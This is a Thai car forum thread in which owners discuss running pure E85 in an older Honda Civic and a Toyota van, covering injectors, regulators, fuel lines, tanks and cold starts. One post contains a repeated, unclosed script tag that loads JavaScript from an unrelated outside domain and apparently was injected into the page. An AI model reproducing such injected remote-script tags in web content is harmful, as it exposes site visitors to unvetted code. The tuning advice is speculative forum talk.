รถที่ใช้ทดลอง civic dimension เป็นรุ่นนึงที่ใช้เป็นรถทดสอบ ผมจึงมั่นใจในระดับหนึ่งว่าอุปกรณ์น่าจะปลอดภัย

แต่ในรถรุ่นอื่นๆก็ไม่สามารถสรุปได้ในแบบเดียวกันครับ ไว้เป็นข้อมูลในการตัดสินใจดู

อ่อคับ ขอบคุณคับ จะลองเข้าไปศึกษาดู การเปลี่ยนหัวฉีดผมก็พอเข้าใจอยู่ เพราะตอนทำมอไซค์ก็ใช้วิธีนี้ ตามที่ผมคิดคือ ถ้าเปลี่ยนหัวฉีดรูใหญ่หรือมากกว่ากว่าเดิม เครื่องก็จะสั่งจ่ายให้มากกว่าเดิมตามหัวฉีด ผมเข้าใจถูกไหมคับ แล้วตัวเร็กกูเรเตอร์บางคนก็บอกให้ใช้แบบที่ปรับได้เพื่อที่จะดึงน้ำมันไปที่หัวฉีดมากขึ้น ส่วนพวกสายน้ำมันผมลองเช็คดูแล้ว เปื่อยคับ เปลี่ยนเรียบร้อยเพราะยังไงก็ต้องเปลี่ยนถึงจะไม่ได้เติม E85 ก็เหอะ มีแค่ 4 สายใช่ไหมคับ ที่แช่ในถึงอีกอัน แล้วก็มีท่อยางจากช่องที่เติมมาลงถังเส้นใหญ่เหมือนกัน ส่วนไหนที่เปลี่ยนอีกคับ ถึงน้ำมันเป็นเหล็กแต่ไม่รู้ว่าเคลือบสารกันสนิมมาไหม
anglo


ชื่อเล่น: นัท

เข้าร่วม: 10 พฤษภาคม 2012
ตอบ: 1475

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1496
ให้คำขอบคุณ: 621

ที่อยู่: 19/313 หมู่บ้านณัฐกมล รัษฎา2 ซ.3 ถ.รัษฎานุสรณ์ ต.รัษฎา อ.เมือง จ.ภูเก็ต 83000
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
เสาร์, 22 ธันวา 2012 09:31 - ผมเติม E85 เพียวๆเลยครับ
nekimaja พิมพ์ว่า:
สวัสดีคับ พอดีที่บ้านมีรถตู้โตโยต้าอยู่คันนึง เครื่อง 3S-FE อยากเติม E85 ก็เลยลองหาความรู้จากกระทู้ต่างๆ เพิ่งเข้ามาเจออ่านไปได้เกือบ 20 หน้าก็ท้อซะแล้ว ก็เลยลองเติม E85 ไปถังนึง อาการตอนออกตัว/เร่งแซงอืดมากแทบไม่ไปเลย แต่พอช่วง 60 ไปแล้วก็เร่งดี แต่มาช้าหน่อย ไหลได้เรื่อยๆ นอกจากติดกล่องอยากรู้ว่าต้องทำอย่างไรบ้าง อาการถึงหาย ใครเก่งหรือมีเพื่อนที่เซียนๆเครื่องตัวนี้รบกวนทีนะคับ ปล.ถึงไม่ได้ขับฮอนด้าแต่ใจผมรักซีวิคตัวไดเมนชั่นนะคับ^^



ทำไมผมไม่มีปัญหาการเร่งแซงเลยอ่ะครับ ความรู้สึกในการขับขี่ (ไม่รู้คิดไปเองหรือเปล่า) กลับทำได้ดีกว่าเติมแก๊ส 91 ซ่ะด้วยซ้ำ

แต่ผมเพิ่งเติมเป็นถังที่ 2 เอง ยังไงจะ Update ถังต่อๆ ไปเรื่อยๆ ครับ
ได้รับคำขอบคุณจาก: yo555 
pop2pop


เข้าร่วม: 09 มกรา 2011
ตอบ: 334

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 265
ให้คำขอบคุณ: 169

ที่อยู่: สุขุมวิท 101/1
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 22 ธันวา 2012 11:26 - ผมเติม E85 เพียวๆเลยครับ
nekimaja พิมพ์ว่า:

อ่อคับ ขอบคุณคับ จะลองเข้าไปศึกษาดู การเปลี่ยนหัวฉีดผมก็พอเข้าใจอยู่ เพราะตอนทำมอไซค์ก็ใช้วิธีนี้ ตามที่ผมคิดคือ ถ้าเปลี่ยนหัวฉีดรูใหญ่หรือมากกว่ากว่าเดิม เครื่องก็จะสั่งจ่ายให้มากกว่าเดิมตามหัวฉีด ผมเข้าใจถูกไหมคับ แล้วตัวเร็กกูเรเตอร์บางคนก็บอกให้ใช้แบบที่ปรับได้เพื่อที่จะดึงน้ำมันไปที่หัวฉีดมากขึ้น ส่วนพวกสายน้ำมันผมลองเช็คดูแล้ว เปื่อยคับ เปลี่ยนเรียบร้อยเพราะยังไงก็ต้องเปลี่ยนถึงจะไม่ได้เติม E85 ก็เหอะ มีแค่ 4 สายใช่ไหมคับ ที่แช่ในถึงอีกอัน แล้วก็มีท่อยางจากช่องที่เติมมาลงถังเส้นใหญ่เหมือนกัน ส่วนไหนที่เปลี่ยนอีกคับ ถึงน้ำมันเป็นเหล็กแต่ไม่รู้ว่าเคลือบสารกันสนิมมาไหม


ตามที่ผมเข้าใจนะ เมื่อเปลี่ยนหัวฉีด ECU จะรู้หรือเปล่าว่าเราเปลี่ยน(คิดว่าคงไม่รู้) แต่ECU น่าจะสั่งเปิดปิดรูฉีดน้ำมันเป็นช่วงเวลา ในเวลาเท่ากัน หัวฉีดที่มีรูมากกว่าก็น่าจะฉีดน้ำมันเข้าห้องเครื่องมากกว่า อันนี้ก็น่าจะได้regulatorช่วยอีกทางนึง ถ้าregulatorมีแรงสูงก็ยิ่งเพิ่มปริมา๊น้ำมันเยอะขึ้น (หล่ะมั้ง)

ส่วนเรื่องท่อยาง เท่ามีข้อมูลก็ 4 เส้นอย่าที่ว่ามาครับ บวกท่อยางที่ปั้มติ๊กที่ควรจะเป็นเกรด R10

ถังน้ำมัน นี่ผมไม่รู้จริงๆ เคยถามช่างมา บอกว่าถังรถรุ่นใหม่ๆจะไม่ใช่เหล็กเพื่อป้องกันการทำปฏิกิริยากับอากาศ จะได้ไม่เป็นสนิม ส่วนรถเก่าๆไม่รู้เหมือนกัน
nekimaja


ชื่อเล่น: เอ็ม

เข้าร่วม: 21 ธันวา 2012
ตอบ: 72

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 25
ให้คำขอบคุณ: 6

ที่อยู่: สมุทรปราการ
เสาร์, 22 ธันวา 2012 11:53 - ผมเติม E85 เพียวๆเลยครับ
anglo พิมพ์ว่า:
nekimaja พิมพ์ว่า:
สวัสดีคับ พอดีที่บ้านมีรถตู้โตโยต้าอยู่คันนึง เครื่อง 3S-FE อยากเติม E85 ก็เลยลองหาความรู้จากกระทู้ต่างๆ เพิ่งเข้ามาเจออ่านไปได้เกือบ 20 หน้าก็ท้อซะแล้ว ก็เลยลองเติม E85 ไปถังนึง อาการตอนออกตัว/เร่งแซงอืดมากแทบไม่ไปเลย แต่พอช่วง 60 ไปแล้วก็เร่งดี แต่มาช้าหน่อย ไหลได้เรื่อยๆ นอกจากติดกล่องอยากรู้ว่าต้องทำอย่างไรบ้าง อาการถึงหาย ใครเก่งหรือมีเพื่อนที่เซียนๆเครื่องตัวนี้รบกวนทีนะคับ ปล.ถึงไม่ได้ขับฮอนด้าแต่ใจผมรักซีวิคตัวไดเมนชั่นนะคับ^^



ทำไมผมไม่มีปัญหาการเร่งแซงเลยอ่ะครับ ความรู้สึกในการขับขี่ (ไม่รู้คิดไปเองหรือเปล่า) กลับทำได้ดีกว่าเติมแก๊ส 91 ซ่ะด้วยซ้ำ

แต่ผมเพิ่งเติมเป็นถังที่ 2 เอง ยังไงจะ Update ถังต่อๆ ไปเรื่อยๆ ครับ

อาจเป็นเพราะกล่องผมมันโง่ก็ได้คับ รีเซ็ตไปแล้วก็เหมือนเดิม แต่ตอนเครื่องร้อนๆนี่นะวิ่งกระจายเลย แค่ก็นานกว่าจะร้อน เฮ้อ! ขับในเมือง จะช้าก็ไม่ได้ โดนบีบแตรไล่อีก
pop2pop พิมพ์ว่า:
nekimaja พิมพ์ว่า:

อ่อคับ ขอบคุณคับ จะลองเข้าไปศึกษาดู การเปลี่ยนหัวฉีดผมก็พอเข้าใจอยู่ เพราะตอนทำมอไซค์ก็ใช้วิธีนี้ ตามที่ผมคิดคือ ถ้าเปลี่ยนหัวฉีดรูใหญ่หรือมากกว่ากว่าเดิม เครื่องก็จะสั่งจ่ายให้มากกว่าเดิมตามหัวฉีด ผมเข้าใจถูกไหมคับ แล้วตัวเร็กกูเรเตอร์บางคนก็บอกให้ใช้แบบที่ปรับได้เพื่อที่จะดึงน้ำมันไปที่หัวฉีดมากขึ้น ส่วนพวกสายน้ำมันผมลองเช็คดูแล้ว เปื่อยคับ เปลี่ยนเรียบร้อยเพราะยังไงก็ต้องเปลี่ยนถึงจะไม่ได้เติม E85 ก็เหอะ มีแค่ 4 สายใช่ไหมคับ ที่แช่ในถึงอีกอัน แล้วก็มีท่อยางจากช่องที่เติมมาลงถังเส้นใหญ่เหมือนกัน ส่วนไหนที่เปลี่ยนอีกคับ ถึงน้ำมันเป็นเหล็กแต่ไม่รู้ว่าเคลือบสารกันสนิมมาไหม


ตามที่ผมเข้าใจนะ เมื่อเปลี่ยนหัวฉีด ECU จะรู้หรือเปล่าว่าเราเปลี่ยน(คิดว่าคงไม่รู้) แต่ECU น่าจะสั่งเปิดปิดรูฉีดน้ำมันเป็นช่วงเวลา ในเวลาเท่ากัน หัวฉีดที่มีรูมากกว่าก็น่าจะฉีดน้ำมันเข้าห้องเครื่องมากกว่า อันนี้ก็น่าจะได้regulatorช่วยอีกทางนึง ถ้าregulatorมีแรงสูงก็ยิ่งเพิ่มปริมา๊น้ำมันเยอะขึ้น (หล่ะมั้ง)

ส่วนเรื่องท่อยาง เท่ามีข้อมูลก็ 4 เส้นอย่าที่ว่ามาครับ บวกท่อยางที่ปั้มติ๊กที่ควรจะเป็นเกรด R10

ถังน้ำมัน นี่ผมไม่รู้จริงๆ เคยถามช่างมา บอกว่าถังรถรุ่นใหม่ๆจะไม่ใช่เหล็กเพื่อป้องกันการทำปฏิกิริยากับอากาศ จะได้ไม่เป็นสนิม ส่วนรถเก่าๆไม่รู้เหมือนกัน

เรื่องหัวฉีดไม่แน่ใจ แต่เร็กกูเรเตอร์เป็นแบบที่คุณบอกล่ะคับ ท่อยางผมจัดการเรียบร้อยละ ถังมีชนิดไหนมั่งคับ ดูยังไงเพราะผมลองเคาะดูแยกไม่ออก ถ้าเป็นพลาสติกยังพอรู้ แต่ผมถามช่างที่จูนบางคนเขาบอกว่า ถ้าถังไม่เป็นสนิมหรือผุๆข้างในก็หายห่วง ผมว่าน่าจะจริง อย่างเช่นมอเตอร์ไซค์เป็นถังเหล็กหมด แต่เติม E10/20/85 แบบไม่มีปัญหาเรื่องถัง ขอเพียงแค่น้ำมันอย่าแห้งถังพอ พยายามให้เต็มไว้ ปล.รถผมโตโยต้า ทาวน์เอชน่าจะเป็นปี 2001 แต่จดประกอบเข้ามาปี 2010 ตัวสุดท้ายของรถรุ่นนี้คับ มีอีกทีก็ตัวใหม่เลย
yo555


ชื่อเล่น: โย

เข้าร่วม: 13 กรกฎา 2012
ตอบ: 765

Guru ES
Guru ES

ได้รับคำขอบคุณ: 249
ให้คำขอบคุณ: 522

ที่อยู่: เกิด แปดริ้ว..แต่มากริ๊วๆ..อยู่ ชลบุรี
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 22 ธันวา 2012 22:52 - ผมเติม E85 เพียวๆเลยครับ
ได้กลับมาแว๊นนวันแรก..หลังจากพาลูกชายไปอยู่อู่สีมา1เดือน...ยังแร๊งงงเหมียนเดิม555<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ETAI


ชื่อเล่น: ต้อง

เข้าร่วม: 12 กันยา 2012
ตอบ: 82

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 26
ให้คำขอบคุณ: 0

ที่อยู่: ศาลายา-สุขุมวิท คลองตัน
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 23 ธันวา 2012 01:49 - ผมเติม E85 เพียวๆเลยครับ
ถังที่ 9  แล้วครับไฟเครื่องยังไม่ขึ้น ขับดียังไม่มีปัญหา แต่สตาร์ทตอนเช้าๆเหมือนจะไม่ติด สงสารรถจังเวลาสตาร์ท :(
pop2pop


เข้าร่วม: 09 มกรา 2011
ตอบ: 334

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 265
ให้คำขอบคุณ: 169

ที่อยู่: สุขุมวิท 101/1
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 23 ธันวา 2012 09:30 - ผมเติม E85 เพียวๆเลยครับ
ETAI พิมพ์ว่า:
ถังที่ 9  แล้วครับไฟเครื่องยังไม่ขึ้น ขับดียังไม่มีปัญหา แต่สตาร์ทตอนเช้าๆเหมือนจะไม่ติด สงสารรถจังเวลาสตาร์ท :(

ลองใช้วิธีบิดสตาร์ท 2 ครั้งดูครับจะได้ไม่ต้องบิดลากสตาร์ทยาวๆ
บิดครั้งแรกให้มันแชะๆซัก 1-2 ครั้ง แล้วปล่อย
บิดครั้งที่ 2 จะติดง่ายมากครับ
ได้รับคำขอบคุณจาก: honeybeex7 
SimonBKK


เข้าร่วม: 27 มีนา 2012
ตอบ: 991

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 778
ให้คำขอบคุณ: 570

ที่อยู่: ภูเก็ต
อาทิตย์, 23 ธันวา 2012 12:30 - ผมเติม E85 เพียวๆเลยครับ
ข่าวดีครับ ปั๊ม E85 ที่บางจาก กะทู้ ภูเก็ต เปิดให้บริการแล้วทีนี้มีที่เติมเพิ่มอีกที่จาก ปตท.บ้านพอน เป็นสองที่แล้วคร๊าบบบบบบ เพิ่มเติมด้วย ปั๊มบางจากห้าแยกฉลอง ทางไปราไวย์อีกที่ๆมี E85



แก้ไขล่าสุดโดย เมื่อ อังคาร, 25 ธันวา 2012 09:25, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: pop2pop  yo555 
ตอบ
หน้า 42 จาก 79
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.